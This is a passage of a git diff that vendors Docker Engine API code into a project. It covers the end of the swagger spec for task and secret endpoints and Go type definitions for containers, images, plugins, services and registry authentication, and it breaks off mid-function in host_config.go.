+                      ID: "4qvuz4ko70xaltuqbt8956gd1"
+                      Version:
+                        Index: 18
+                      CreatedAt: "2016-06-07T20:31:11.912919752Z"
+                      UpdatedAt: "2016-06-07T21:07:29.955277358Z"
+                      Spec:
+                        Name: "ingress"
+                        Labels:
+                          com.docker.swarm.internal: "true"
+                        DriverConfiguration: {}
+                        IPAMOptions:
+                          Driver: {}
+                          Configs:
+                            - Subnet: "10.255.0.0/16"
+                              Gateway: "10.255.0.1"
+                      DriverState:
+                        Name: "overlay"
+                        Options:
+                          com.docker.network.driver.overlay.vxlanid_list: "256"
+                      IPAMOptions:
+                        Driver:
+                          Name: "default"
+                        Configs:
+                          - Subnet: "10.255.0.0/16"
+                            Gateway: "10.255.0.1"
+                    Addresses:
+                      - "10.255.0.10/16"
+              - ID: "1yljwbmlr8er2waf8orvqpwms"
+                Version:
+                  Index: 30
+                CreatedAt: "2016-06-07T21:07:30.019104782Z"
+                UpdatedAt: "2016-06-07T21:07:30.231958098Z"
+                Name: "hopeful_cori"
+                Spec:
+                  ContainerSpec:
+                    Image: "redis"
+                  Resources:
+                    Limits: {}
+                    Reservations: {}
+                  RestartPolicy:
+                    Condition: "any"
+                    MaxAttempts: 0
+                  Placement: {}
+                ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz"
+                Slot: 1
+                NodeID: "60gvrl6tm78dmak4yl7srz94v"
+                Status:
+                  Timestamp: "2016-06-07T21:07:30.202183143Z"
+                  State: "shutdown"
+                  Message: "shutdown"
+                  ContainerStatus:
+                    ContainerID: "1cf8d63d18e79668b0004a4be4c6ee58cddfad2dae29506d8781581d0688a213"
+                DesiredState: "shutdown"
+                NetworksAttachments:
+                  - Network:
+                      ID: "4qvuz4ko70xaltuqbt8956gd1"
+                      Version:
+                        Index: 18
+                      CreatedAt: "2016-06-07T20:31:11.912919752Z"
+                      UpdatedAt: "2016-06-07T21:07:29.955277358Z"
+                      Spec:
+                        Name: "ingress"
+                        Labels:
+                          com.docker.swarm.internal: "true"
+                        DriverConfiguration: {}
+                        IPAMOptions:
+                          Driver: {}
+                          Configs:
+                            - Subnet: "10.255.0.0/16"
+                              Gateway: "10.255.0.1"
+                      DriverState:
+                        Name: "overlay"
+                        Options:
+                          com.docker.network.driver.overlay.vxlanid_list: "256"
+                      IPAMOptions:
+                        Driver:
+                          Name: "default"
+                        Configs:
+                          - Subnet: "10.255.0.0/16"
+                            Gateway: "10.255.0.1"
+                    Addresses:
+                      - "10.255.0.5/16"
+
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          type: "string"
+          description: |
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the tasks list. Available filters:
+
+            - `id=<task id>`
+            - `name=<task name>`
+            - `service=<service name>`
+            - `node=<node id or name>`
+            - `label=key` or `label="key=value"`
+            - `desired-state=(running | shutdown | accepted)`
+      tags: ["Task"]
+  /tasks/{id}:
+    get:
+      summary: "Inspect a task"
+      operationId: "TaskInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/Task"
+        404:
+          description: "no such task"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "ID of the task"
+          required: true
+          type: "string"
+      tags: ["Task"]
+  /secrets:
+    get:
+      summary: "List secrets"
+      operationId: "SecretList"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            type: "array"
+            items:
+              $ref: "#/definitions/Secret"
+            example:
+              - ID: "ktnbjxoalbkvbvedmg1urrz8h"
+                Version:
+                  Index: 11
+                CreatedAt: "2016-11-05T01:20:17.327670065Z"
+                UpdatedAt: "2016-11-05T01:20:17.327670065Z"
+                Spec:
+                  Name: "app-dev.crt"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "filters"
+          in: "query"
+          type: "string"
+          description: |
+            A JSON encoded value of the filters (a `map[string][]string`) to process on the secrets list. Available filters:
+
+            - `names=<secret name>`
+      tags: ["Secret"]
+  /secrets/create:
+    post:
+      summary: "Create a secret"
+      operationId: "SecretCreate"
+      consumes:
+        - "application/json"
+      produces:
+        - "application/json"
+      responses:
+        201:
+          description: "no error"
+          schema:
+            type: "object"
+            properties:
+              ID:
+                description: "The ID of the created secret."
+                type: "string"
+            example:
+              ID: "ktnbjxoalbkvbvedmg1urrz8h"
+        406:
+          description: "server error or node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        409:
+          description: "name conflicts with an existing object"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "body"
+          in: "body"
+          schema:
+            allOf:
+              - $ref: "#/definitions/SecretSpec"
+              - type: "object"
+                example:
+                  Name: "app-key.crt"
+                  Labels:
+                    foo: "bar"
+                  Data: "VEhJUyBJUyBOT1QgQSBSRUFMIENFUlRJRklDQVRFCg=="
+      tags: ["Secret"]
+  /secrets/{id}:
+    get:
+      summary: "Inspect a secret"
+      operationId: "SecretInspect"
+      produces:
+        - "application/json"
+      responses:
+        200:
+          description: "no error"
+          schema:
+            $ref: "#/definitions/Secret"
+            example:
+              ID: "ktnbjxoalbkvbvedmg1urrz8h"
+              Version:
+                Index: 11
+              CreatedAt: "2016-11-05T01:20:17.327670065Z"
+              UpdatedAt: "2016-11-05T01:20:17.327670065Z"
+              Spec:
+                Name: "app-dev.crt"
+        404:
+          description: "secret not found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        406:
+          description: "node is not part of a swarm"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          type: "string"
+          description: "ID of the secret"
+      tags: ["Secret"]
+    delete:
+      summary: "Delete a secret"
+      operationId: "SecretDelete"
+      produces:
+        - "application/json"
+      responses:
+        204:
+          description: "no error"
+        404:
+          description: "secret not found"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          required: true
+          type: "string"
+          description: "ID of the secret"
+      tags: ["Secret"]
+  /secrets/{id}/update:
+    post:
+      summary: "Update a Secret"
+      operationId: "SecretUpdate"
+      responses:
+        200:
+          description: "no error"
+        404:
+          description: "no such secret"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+        500:
+          description: "server error"
+          schema:
+            $ref: "#/definitions/ErrorResponse"
+      parameters:
+        - name: "id"
+          in: "path"
+          description: "The ID of the secret"
+          type: "string"
+          required: true
+        - name: "body"
+          in: "body"
+          schema:
+            $ref: "#/definitions/SecretSpec"
+          description: "The spec of the secret to update. Currently, only the Labels field can be updated. All other fields must remain unchanged from the [SecretInspect endpoint](#operation/SecretInspect) response values."
+        - name: "version"
+          in: "query"
+          description: "The version number of the secret object being updated. This is required to avoid conflicting writes."
+          type: "integer"
+          format: "int64"
+          required: true
+      tags: ["Secret"]
diff --git a/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl b/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl
new file mode 100644
index 0000000000..3a3d7527da
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/templates/server/operation.gotmpl
@@ -0,0 +1,26 @@
+package {{ .Package }}
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/swagger-gen.sh
+// ----------------------------------------------------------------------------
+
+import (
+	"net/http"
+
+	context "golang.org/x/net/context"
+
+  {{ range .DefaultImports }}{{ printf "%q" . }}
+  {{ end }}
+  {{ range $key, $value := .Imports }}{{ $key }} {{ printf "%q" $value }}
+  {{ end }}
+)
+
+
+{{ range .ExtraSchemas }}
+// {{ .Name }} {{ template "docstring" . }}
+// swagger:model {{ .Name }}
+{{ template "schema" . }}
+{{ end }}
diff --git a/vendor/github.com/docker/docker/api/types/auth.go b/vendor/github.com/docker/docker/api/types/auth.go
new file mode 100644
index 0000000000..056af6b842
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/auth.go
@@ -0,0 +1,22 @@
+package types
+
+// AuthConfig contains authorization information for connecting to a Registry
+type AuthConfig struct {
+	Username string `json:"username,omitempty"`
+	Password string `json:"password,omitempty"`
+	Auth     string `json:"auth,omitempty"`
+
+	// Email is an optional value associated with the username.
+	// This field is deprecated and will be removed in a later
+	// version of docker.
+	Email string `json:"email,omitempty"`
+
+	ServerAddress string `json:"serveraddress,omitempty"`
+
+	// IdentityToken is used to authenticate the user and get
+	// an access token for the registry.
+	IdentityToken string `json:"identitytoken,omitempty"`
+
+	// RegistryToken is a bearer token to be sent to a registry
+	RegistryToken string `json:"registrytoken,omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/backend/backend.go b/vendor/github.com/docker/docker/api/types/backend/backend.go
new file mode 100644
index 0000000000..abc0bba3fe
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/backend/backend.go
@@ -0,0 +1,84 @@
+// Package backend includes types to send information to server backends.
+package backend
+
+import (
+	"io"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/streamformatter"
+)
+
+// ContainerAttachConfig holds the streams to use when connecting to a container to view logs.
+type ContainerAttachConfig struct {
+	GetStreams func() (io.ReadCloser, io.Writer, io.Writer, error)
+	UseStdin   bool
+	UseStdout  bool
+	UseStderr  bool
+	Logs       bool
+	Stream     bool
+	DetachKeys string
+
+	// Used to signify that streams are multiplexed and therefore need a StdWriter to encode stdout/sderr messages accordingly.
+	// TODO @cpuguy83: This shouldn't be needed. It was only added so that http and websocket endpoints can use the same function, and the websocket function was not using a stdwriter prior to this change...
+	// HOWEVER, the websocket endpoint is using a single stream and SHOULD be encoded with stdout/stderr as is done for HTTP since it is still just a single stream.
+	// Since such a change is an API change unrelated to the current changeset we'll keep it as is here and change separately.
+	MuxStreams bool
+}
+
+// ContainerLogsConfig holds configs for logging operations. Exists
+// for users of the backend to to pass it a logging configuration.
+type ContainerLogsConfig struct {
+	types.ContainerLogsOptions
+	OutStream io.Writer
+}
+
+// ContainerStatsConfig holds information for configuring the runtime
+// behavior of a backend.ContainerStats() call.
+type ContainerStatsConfig struct {
+	Stream    bool
+	OutStream io.Writer
+	Version   string
+}
+
+// ExecInspect holds information about a running process started
+// with docker exec.
+type ExecInspect struct {
+	ID            string
+	Running       bool
+	ExitCode      *int
+	ProcessConfig *ExecProcessConfig
+	OpenStdin     bool
+	OpenStderr    bool
+	OpenStdout    bool
+	CanRemove     bool
+	ContainerID   string
+	DetachKeys    []byte
+	Pid           int
+}
+
+// ExecProcessConfig holds information about the exec process
+// running on the host.
+type ExecProcessConfig struct {
+	Tty        bool     `json:"tty"`
+	Entrypoint string   `json:"entrypoint"`
+	Arguments  []string `json:"arguments"`
+	Privileged *bool    `json:"privileged,omitempty"`
+	User       string   `json:"user,omitempty"`
+}
+
+// ContainerCommitConfig is a wrapper around
+// types.ContainerCommitConfig that also
+// transports configuration changes for a container.
+type ContainerCommitConfig struct {
+	types.ContainerCommitConfig
+	Changes []string
+}
+
+// ProgressWriter is an interface
+// to transport progress streams.
+type ProgressWriter struct {
+	Output             io.Writer
+	StdoutFormatter    *streamformatter.StdoutFormatter
+	StderrFormatter    *streamformatter.StderrFormatter
+	ProgressReaderFunc func(io.ReadCloser) io.ReadCloser
+}
diff --git a/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go b/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go
new file mode 100644
index 0000000000..931ae10ab1
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/blkiodev/blkio.go
@@ -0,0 +1,23 @@
+package blkiodev
+
+import "fmt"
+
+// WeightDevice is a structure that holds device:weight pair
+type WeightDevice struct {
+	Path   string
+	Weight uint16
+}
+
+func (w *WeightDevice) String() string {
+	return fmt.Sprintf("%s:%d", w.Path, w.Weight)
+}
+
+// ThrottleDevice is a structure that holds device:rate_per_second pair
+type ThrottleDevice struct {
+	Path string
+	Rate uint64
+}
+
+func (t *ThrottleDevice) String() string {
+	return fmt.Sprintf("%s:%d", t.Path, t.Rate)
+}
diff --git a/vendor/github.com/docker/docker/api/types/client.go b/vendor/github.com/docker/docker/api/types/client.go
new file mode 100644
index 0000000000..7900d64f0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/client.go
@@ -0,0 +1,378 @@
+package types
+
+import (
+	"bufio"
+	"io"
+	"net"
+	"os"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/go-units"
+)
+
+// CheckpointCreateOptions holds parameters to create a checkpoint from a container
+type CheckpointCreateOptions struct {
+	CheckpointID  string
+	CheckpointDir string
+	Exit          bool
+}
+
+// CheckpointListOptions holds parameters to list checkpoints for a container
+type CheckpointListOptions struct {
+	CheckpointDir string
+}
+
+// CheckpointDeleteOptions holds parameters to delete a checkpoint from a container
+type CheckpointDeleteOptions struct {
+	CheckpointID  string
+	CheckpointDir string
+}
+
+// ContainerAttachOptions holds parameters to attach to a container.
+type ContainerAttachOptions struct {
+	Stream     bool
+	Stdin      bool
+	Stdout     bool
+	Stderr     bool
+	DetachKeys string
+	Logs       bool
+}
+
+// ContainerCommitOptions holds parameters to commit changes into a container.
+type ContainerCommitOptions struct {
+	Reference string
+	Comment   string
+	Author    string
+	Changes   []string
+	Pause     bool
+	Config    *container.Config
+}
+
+// ContainerExecInspect holds information returned by exec inspect.
+type ContainerExecInspect struct {
+	ExecID      string
+	ContainerID string
+	Running     bool
+	ExitCode    int
+	Pid         int
+}
+
+// ContainerListOptions holds parameters to list containers with.
+type ContainerListOptions struct {
+	Quiet   bool
+	Size    bool
+	All     bool
+	Latest  bool
+	Since   string
+	Before  string
+	Limit   int
+	Filters filters.Args
+}
+
+// ContainerLogsOptions holds parameters to filter logs with.
+type ContainerLogsOptions struct {
+	ShowStdout bool
+	ShowStderr bool
+	Since      string
+	Timestamps bool
+	Follow     bool
+	Tail       string
+	Details    bool
+}
+
+// ContainerRemoveOptions holds parameters to remove containers.
+type ContainerRemoveOptions struct {
+	RemoveVolumes bool
+	RemoveLinks   bool
+	Force         bool
+}
+
+// ContainerStartOptions holds parameters to start containers.
+type ContainerStartOptions struct {
+	CheckpointID  string
+	CheckpointDir string
+}
+
+// CopyToContainerOptions holds information
+// about files to copy into a container
+type CopyToContainerOptions struct {
+	AllowOverwriteDirWithFile bool
+}
+
+// EventsOptions holds parameters to filter events with.
+type EventsOptions struct {
+	Since   string
+	Until   string
+	Filters filters.Args
+}
+
+// NetworkListOptions holds parameters to filter the list of networks with.
+type NetworkListOptions struct {
+	Filters filters.Args
+}
+
+// HijackedResponse holds connection information for a hijacked request.
+type HijackedResponse struct {
+	Conn   net.Conn
+	Reader *bufio.Reader
+}
+
+// Close closes the hijacked connection and reader.
+func (h *HijackedResponse) Close() {
+	h.Conn.Close()
+}
+
+// CloseWriter is an interface that implements structs
+// that close input streams to prevent from writing.
+type CloseWriter interface {
+	CloseWrite() error
+}
+
+// CloseWrite closes a readWriter for writing.
+func (h *HijackedResponse) CloseWrite() error {
+	if conn, ok := h.Conn.(CloseWriter); ok {
+		return conn.CloseWrite()
+	}
+	return nil
+}
+
+// ImageBuildOptions holds the information
+// necessary to build images.
+type ImageBuildOptions struct {
+	Tags           []string
+	SuppressOutput bool
+	RemoteContext  string
+	NoCache        bool
+	Remove         bool
+	ForceRemove    bool
+	PullParent     bool
+	Isolation      container.Isolation
+	CPUSetCPUs     string
+	CPUSetMems     string
+	CPUShares      int64
+	CPUQuota       int64
+	CPUPeriod      int64
+	Memory         int64
+	MemorySwap     int64
+	CgroupParent   string
+	NetworkMode    string
+	ShmSize        int64
+	Dockerfile     string
+	Ulimits        []*units.Ulimit
+	// See the parsing of buildArgs in api/server/router/build/build_routes.go
+	// for an explaination of why BuildArgs needs to use *string instead of
+	// just a string
+	BuildArgs   map[string]*string
+	AuthConfigs map[string]AuthConfig
+	Context     io.Reader
+	Labels      map[string]string
+	// squash the resulting image's layers to the parent
+	// preserves the original image and creates a new one from the parent with all
+	// the changes applied to a single layer
+	Squash bool
+	// CacheFrom specifies images that are used for matching cache. Images
+	// specified here do not need to have a valid parent chain to match cache.
+	CacheFrom   []string
+	SecurityOpt []string
+}
+
+// ImageBuildResponse holds information
+// returned by a server after building
+// an image.
+type ImageBuildResponse struct {
+	Body   io.ReadCloser
+	OSType string
+}
+
+// ImageCreateOptions holds information to create images.
+type ImageCreateOptions struct {
+	RegistryAuth string // RegistryAuth is the base64 encoded credentials for the registry
+}
+
+// ImageImportSource holds source information for ImageImport
+type ImageImportSource struct {
+	Source     io.Reader // Source is the data to send to the server to create this image from (mutually exclusive with SourceName)
+	SourceName string    // SourceName is the name of the image to pull (mutually exclusive with Source)
+}
+
+// ImageImportOptions holds information to import images from the client host.
+type ImageImportOptions struct {
+	Tag     string   // Tag is the name to tag this image with. This attribute is deprecated.
+	Message string   // Message is the message to tag the image with
+	Changes []string // Changes are the raw changes to apply to this image
+}
+
+// ImageListOptions holds parameters to filter the list of images with.
+type ImageListOptions struct {
+	All     bool
+	Filters filters.Args
+}
+
+// ImageLoadResponse returns information to the client about a load process.
+type ImageLoadResponse struct {
+	// Body must be closed to avoid a resource leak
+	Body io.ReadCloser
+	JSON bool
+}
+
+// ImagePullOptions holds information to pull images.
+type ImagePullOptions struct {
+	All           bool
+	RegistryAuth  string // RegistryAuth is the base64 encoded credentials for the registry
+	PrivilegeFunc RequestPrivilegeFunc
+}
+
+// RequestPrivilegeFunc is a function interface that
+// clients can supply to retry operations after
+// getting an authorization error.
+// This function returns the registry authentication
+// header value in base 64 format, or an error
+// if the privilege request fails.
+type RequestPrivilegeFunc func() (string, error)
+
+//ImagePushOptions holds information to push images.
+type ImagePushOptions ImagePullOptions
+
+// ImageRemoveOptions holds parameters to remove images.
+type ImageRemoveOptions struct {
+	Force         bool
+	PruneChildren bool
+}
+
+// ImageSearchOptions holds parameters to search images with.
+type ImageSearchOptions struct {
+	RegistryAuth  string
+	PrivilegeFunc RequestPrivilegeFunc
+	Filters       filters.Args
+	Limit         int
+}
+
+// ResizeOptions holds parameters to resize a tty.
+// It can be used to resize container ttys and
+// exec process ttys too.
+type ResizeOptions struct {
+	Height uint
+	Width  uint
+}
+
+// VersionResponse holds version information for the client and the server
+type VersionResponse struct {
+	Client *Version
+	Server *Version
+}
+
+// ServerOK returns true when the client could connect to the docker server
+// and parse the information received. It returns false otherwise.
+func (v VersionResponse) ServerOK() bool {
+	return v.Server != nil
+}
+
+// NodeListOptions holds parameters to list nodes with.
+type NodeListOptions struct {
+	Filters filters.Args
+}
+
+// NodeRemoveOptions holds parameters to remove nodes with.
+type NodeRemoveOptions struct {
+	Force bool
+}
+
+// ServiceCreateOptions contains the options to use when creating a service.
+type ServiceCreateOptions struct {
+	// EncodedRegistryAuth is the encoded registry authorization credentials to
+	// use when updating the service.
+	//
+	// This field follows the format of the X-Registry-Auth header.
+	EncodedRegistryAuth string
+}
+
+// ServiceCreateResponse contains the information returned to a client
+// on the creation of a new service.
+type ServiceCreateResponse struct {
+	// ID is the ID of the created service.
+	ID string
+	// Warnings is a set of non-fatal warning messages to pass on to the user.
+	Warnings []string `json:",omitempty"`
+}
+
+// Values for RegistryAuthFrom in ServiceUpdateOptions
+const (
+	RegistryAuthFromSpec         = "spec"
+	RegistryAuthFromPreviousSpec = "previous-spec"
+)
+
+// ServiceUpdateOptions contains the options to be used for updating services.
+type ServiceUpdateOptions struct {
+	// EncodedRegistryAuth is the encoded registry authorization credentials to
+	// use when updating the service.
+	//
+	// This field follows the format of the X-Registry-Auth header.
+	EncodedRegistryAuth string
+
+	// TODO(stevvooe): Consider moving the version parameter of ServiceUpdate
+	// into this field. While it does open API users up to racy writes, most
+	// users may not need that level of consistency in practice.
+
+	// RegistryAuthFrom specifies where to find the registry authorization
+	// credentials if they are not given in EncodedRegistryAuth. Valid
+	// values are "spec" and "previous-spec".
+	RegistryAuthFrom string
+}
+
+// ServiceListOptions holds parameters to list  services with.
+type ServiceListOptions struct {
+	Filters filters.Args
+}
+
+// TaskListOptions holds parameters to list  tasks with.
+type TaskListOptions struct {
+	Filters filters.Args
+}
+
+// PluginRemoveOptions holds parameters to remove plugins.
+type PluginRemoveOptions struct {
+	Force bool
+}
+
+// PluginEnableOptions holds parameters to enable plugins.
+type PluginEnableOptions struct {
+	Timeout int
+}
+
+// PluginDisableOptions holds parameters to disable plugins.
+type PluginDisableOptions struct {
+	Force bool
+}
+
+// PluginInstallOptions holds parameters to install a plugin.
+type PluginInstallOptions struct {
+	Disabled              bool
+	AcceptAllPermissions  bool
+	RegistryAuth          string // RegistryAuth is the base64 encoded credentials for the registry
+	RemoteRef             string // RemoteRef is the plugin name on the registry
+	PrivilegeFunc         RequestPrivilegeFunc
+	AcceptPermissionsFunc func(PluginPrivileges) (bool, error)
+	Args                  []string
+}
+
+// SecretRequestOption is a type for requesting secrets
+type SecretRequestOption struct {
+	Source string
+	Target string
+	UID    string
+	GID    string
+	Mode   os.FileMode
+}
+
+// SwarmUnlockKeyResponse contains the response for Engine API:
+// GET /swarm/unlockkey
+type SwarmUnlockKeyResponse struct {
+	// UnlockKey is the unlock key in ASCII-armored format.
+	UnlockKey string
+}
+
+// PluginCreateOptions hold all options to plugin create.
+type PluginCreateOptions struct {
+	RepoName string
+}
diff --git a/vendor/github.com/docker/docker/api/types/configs.go b/vendor/github.com/docker/docker/api/types/configs.go
new file mode 100644
index 0000000000..20c19f2132
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/configs.go
@@ -0,0 +1,69 @@
+package types
+
+import (
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/network"
+)
+
+// configs holds structs used for internal communication between the
+// frontend (such as an http server) and the backend (such as the
+// docker daemon).
+
+// ContainerCreateConfig is the parameter set to ContainerCreate()
+type ContainerCreateConfig struct {
+	Name             string
+	Config           *container.Config
+	HostConfig       *container.HostConfig
+	NetworkingConfig *network.NetworkingConfig
+	AdjustCPUShares  bool
+}
+
+// ContainerRmConfig holds arguments for the container remove
+// operation. This struct is used to tell the backend what operations
+// to perform.
+type ContainerRmConfig struct {
+	ForceRemove, RemoveVolume, RemoveLink bool
+}
+
+// ContainerCommitConfig contains build configs for commit operation,
+// and is used when making a commit with the current state of the container.
+type ContainerCommitConfig struct {
+	Pause   bool
+	Repo    string
+	Tag     string
+	Author  string
+	Comment string
+	// merge container config into commit config before commit
+	MergeConfigs bool
+	Config       *container.Config
+}
+
+// ExecConfig is a small subset of the Config struct that holds the configuration
+// for the exec feature of docker.
+type ExecConfig struct {
+	User         string   // User that will run the command
+	Privileged   bool     // Is the container in privileged mode
+	Tty          bool     // Attach standard streams to a tty.
+	AttachStdin  bool     // Attach the standard input, makes possible user interaction
+	AttachStderr bool     // Attach the standard error
+	AttachStdout bool     // Attach the standard output
+	Detach       bool     // Execute in detach mode
+	DetachKeys   string   // Escape keys for detach
+	Env          []string // Environment variables
+	Cmd          []string // Execution commands and args
+}
+
+// PluginRmConfig holds arguments for plugin remove.
+type PluginRmConfig struct {
+	ForceRemove bool
+}
+
+// PluginEnableConfig holds arguments for plugin enable
+type PluginEnableConfig struct {
+	Timeout int
+}
+
+// PluginDisableConfig holds arguments for plugin disable.
+type PluginDisableConfig struct {
+	ForceDisable bool
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/config.go b/vendor/github.com/docker/docker/api/types/container/config.go
new file mode 100644
index 0000000000..fc050e5dba
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/config.go
@@ -0,0 +1,62 @@
+package container
+
+import (
+	"time"
+
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/go-connections/nat"
+)
+
+// HealthConfig holds configuration settings for the HEALTHCHECK feature.
+type HealthConfig struct {
+	// Test is the test to perform to check that the container is healthy.
+	// An empty slice means to inherit the default.
+	// The options are:
+	// {} : inherit healthcheck
+	// {"NONE"} : disable healthcheck
+	// {"CMD", args...} : exec arguments directly
+	// {"CMD-SHELL", command} : run command with system's default shell
+	Test []string `json:",omitempty"`
+
+	// Zero means to inherit. Durations are expressed as integer nanoseconds.
+	Interval time.Duration `json:",omitempty"` // Interval is the time to wait between checks.
+	Timeout  time.Duration `json:",omitempty"` // Timeout is the time to wait before considering the check to have hung.
+
+	// Retries is the number of consecutive failures needed to consider a container as unhealthy.
+	// Zero means inherit.
+	Retries int `json:",omitempty"`
+}
+
+// Config contains the configuration data about a container.
+// It should hold only portable information about the container.
+// Here, "portable" means "independent from the host we are running on".
+// Non-portable information *should* appear in HostConfig.
+// All fields added to this struct must be marked `omitempty` to keep getting
+// predictable hashes from the old `v1Compatibility` configuration.
+type Config struct {
+	Hostname        string              // Hostname
+	Domainname      string              // Domainname
+	User            string              // User that will run the command(s) inside the container, also support user:group
+	AttachStdin     bool                // Attach the standard input, makes possible user interaction
+	AttachStdout    bool                // Attach the standard output
+	AttachStderr    bool                // Attach the standard error
+	ExposedPorts    nat.PortSet         `json:",omitempty"` // List of exposed ports
+	Tty             bool                // Attach standard streams to a tty, including stdin if it is not closed.
+	OpenStdin       bool                // Open stdin
+	StdinOnce       bool                // If true, close stdin after the 1 attached client disconnects.
+	Env             []string            // List of environment variable to set in the container
+	Cmd             strslice.StrSlice   // Command to run when starting the container
+	Healthcheck     *HealthConfig       `json:",omitempty"` // Healthcheck describes how to check the container is healthy
+	ArgsEscaped     bool                `json:",omitempty"` // True if command is already escaped (Windows specific)
+	Image           string              // Name of the image as it was passed by the operator (e.g. could be symbolic)
+	Volumes         map[string]struct{} // List of volumes (mounts) used for the container
+	WorkingDir      string              // Current directory (PWD) in the command will be launched
+	Entrypoint      strslice.StrSlice   // Entrypoint to run when starting the container
+	NetworkDisabled bool                `json:",omitempty"` // Is network disabled
+	MacAddress      string              `json:",omitempty"` // Mac Address of the container
+	OnBuild         []string            // ONBUILD metadata that were defined on the image Dockerfile
+	Labels          map[string]string   // List of labels set to this container
+	StopSignal      string              `json:",omitempty"` // Signal to stop a container
+	StopTimeout     *int                `json:",omitempty"` // Timeout (in seconds) to stop a container
+	Shell           strslice.StrSlice   `json:",omitempty"` // Shell for shell-form of RUN, CMD, ENTRYPOINT
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/container_create.go b/vendor/github.com/docker/docker/api/types/container/container_create.go
new file mode 100644
index 0000000000..d028e3b121
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/container_create.go
@@ -0,0 +1,21 @@
+package container
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/swagger-gen.sh
+// ----------------------------------------------------------------------------
+
+// ContainerCreateCreatedBody container create created body
+// swagger:model ContainerCreateCreatedBody
+type ContainerCreateCreatedBody struct {
+
+	// The ID of the created container
+	// Required: true
+	ID string `json:"Id"`
+
+	// Warnings encountered when creating the container
+	// Required: true
+	Warnings []string `json:"Warnings"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/container_update.go b/vendor/github.com/docker/docker/api/types/container/container_update.go
new file mode 100644
index 0000000000..81ee12c678
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/container_update.go
@@ -0,0 +1,17 @@
+package container
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/swagger-gen.sh
+// ----------------------------------------------------------------------------
+
+// ContainerUpdateOKBody container update o k body
+// swagger:model ContainerUpdateOKBody
+type ContainerUpdateOKBody struct {
+
+	// warnings
+	// Required: true
+	Warnings []string `json:"Warnings"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/container_wait.go b/vendor/github.com/docker/docker/api/types/container/container_wait.go
new file mode 100644
index 0000000000..16cf335321
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/container_wait.go
@@ -0,0 +1,17 @@
+package container
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/swagger-gen.sh
+// ----------------------------------------------------------------------------
+
+// ContainerWaitOKBody container wait o k body
+// swagger:model ContainerWaitOKBody
+type ContainerWaitOKBody struct {
+
+	// Exit code of the container
+	// Required: true
+	StatusCode int64 `json:"StatusCode"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/host_config.go b/vendor/github.com/docker/docker/api/types/container/host_config.go
new file mode 100644
index 0000000000..0c82d625e8
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/host_config.go
@@ -0,0 +1,333 @@
+package container
+
+import (
+	"strings"
+
+	"github.com/docker/docker/api/types/blkiodev"
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/go-connections/nat"
+	"github.com/docker/go-units"
+)
+
+// NetworkMode represents the container network stack.
+type NetworkMode string
+
+// Isolation represents the isolation technology of a container. The supported
+// values are platform specific
+type Isolation string
+
+// IsDefault indicates the default isolation technology of a container. On Linux this
+// is the native driver. On Windows, this is a Windows Server Container.
+func (i Isolation) IsDefault() bool {
+	return strings.ToLower(string(i)) == "default" || string(i) == ""
+}
+
+// IpcMode represents the container ipc stack.
+type IpcMode string
+
+// IsPrivate indicates whether the container uses its private ipc stack.
+func (n IpcMode) IsPrivate() bool {
+	return !(n.IsHost() || n.IsContainer())
